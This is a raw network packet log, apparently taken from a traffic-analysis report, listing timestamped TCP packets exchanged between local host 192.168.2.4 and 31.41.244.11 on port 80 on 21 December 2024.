                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.767379999 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.767591953 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.768445015 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.768645048 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.768811941 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.769608974 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.769766092 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.769795895 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.770849943 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.770967960 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.770998955 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.771289110 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.772003889 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.772128105 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.772140980 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.772285938 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.773264885 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.773344994 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.773422956 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.773511887 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.774418116 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.774527073 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.774615049 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.775579929 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.775806904 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.775835037 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.776772976 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.776909113 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.776947975 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.777942896 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.777971983 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.778126955 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.778350115 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.779160023 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.779215097 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.779292107 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.780013084 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.780344009 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.780513048 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.780544043 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.781519890 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.781672955 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.781702042 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.781836987 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.782707930 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.782816887 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.782864094 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.913516045 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.913789988 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.913857937 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.913913965 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.914232969 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.914318085 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.914355993 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.914551973 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.915261030 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.915429115 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.915518999 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.916428089 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.916567087 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.917402029 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.917644024 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.917762995 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.917788982 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.917906046 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.918910027 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.918986082 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.919095993 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.920119047 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.920228004 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.920258999 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.920381069 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.921237946 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.921369076 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.921457052 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.922396898 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.922512054 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.923628092 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.923664093 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.923768044 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.924170017 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.924806118 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.924918890 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.924943924 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.925088882 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.925966978 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.926099062 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.926104069 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.926156998 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.927148104 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.927201986 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.927295923 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.927558899 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.928373098 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.928502083 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.928555965 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.929610014 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.929748058 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.929954052 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.930732965 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.930871010 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.930902958 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.931926966 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.932120085 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.932149887 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.932286978 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.933141947 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.933258057 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.933284998 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.933406115 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.934303045 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.934376955 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.934437990 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.934494019 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.935499907 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.935689926 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.935765982 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.936737061 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.936849117 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.937081099 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.937972069 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.938112020 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.938124895 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.938172102 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.939132929 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.939254045 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.940310001 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.940440893 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.940480947 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.941508055 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.941716909 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.941746950 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.942531109 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.942677975 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.942817926 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.942981005 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.943897009 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.943996906 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.944013119 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.944226980 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.945036888 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.945152044 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.945265055 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.946289062 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.946391106 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.947190046 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.947487116 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.947602987 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.947660923 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.948637962 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.948719025 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.948780060 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.948824883 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.949814081 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.949884892 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.949947119 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.950110912 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.951109886 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.951184988 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.951596975 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.952249050 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.952317953 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.952349901 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.953490973 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.953603983 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.953633070 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.954564095 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.954592943 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.954695940 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.954874039 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.955790043 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.955929041 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.956010103 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.956954002 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.957060099 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.957091093 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.958134890 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.958273888 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.958304882 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.959043980 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.959326982 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.959475994 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.959646940 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.960508108 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.960597992 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.960639954 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.960715055 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.961782932 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.961874962 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.961884022 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.962012053 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.962970972 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.963046074 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.963320017 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.964102983 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.964246035 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.964276075 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.965311050 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.965455055 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.965486050 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.966351986 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.966470003 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.966557026 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.966638088 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.966708899 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.967665911 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.967786074 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.967864990 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.968858004 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.968981981 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.969775915 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.970055103 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.970175028 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.970184088 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.970308065 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.971249104 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.971328974 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.971362114 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.971443892 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.972507954 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.972588062 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.972604036 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.972732067 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.973619938 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.973702908 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.973745108 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.974003077 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.974848986 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.974968910 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.975836992 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.975939035 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.976051092 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.105663061 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.105819941 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.106076956 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.106120110 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.106190920 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.106322050 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.106504917 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.106679916 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.107521057 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.107639074 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.107975960 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.108772039 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.108901024 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.108930111 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.109913111 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.110042095 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.110071898 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.111087084 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.111115932 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.111193895 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.111406088 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.112272978 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.112428904 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.112459898 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.112592936 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.113461018 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.113554001 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.113614082 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.113909006 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.114675045 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.114783049 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.114809036 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.115912914 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.115947008 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.116117001 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.116151094 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.116333961 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.117063999 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.117157936 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:21.117207050 CET4979180192.168.2.431.41.244.11
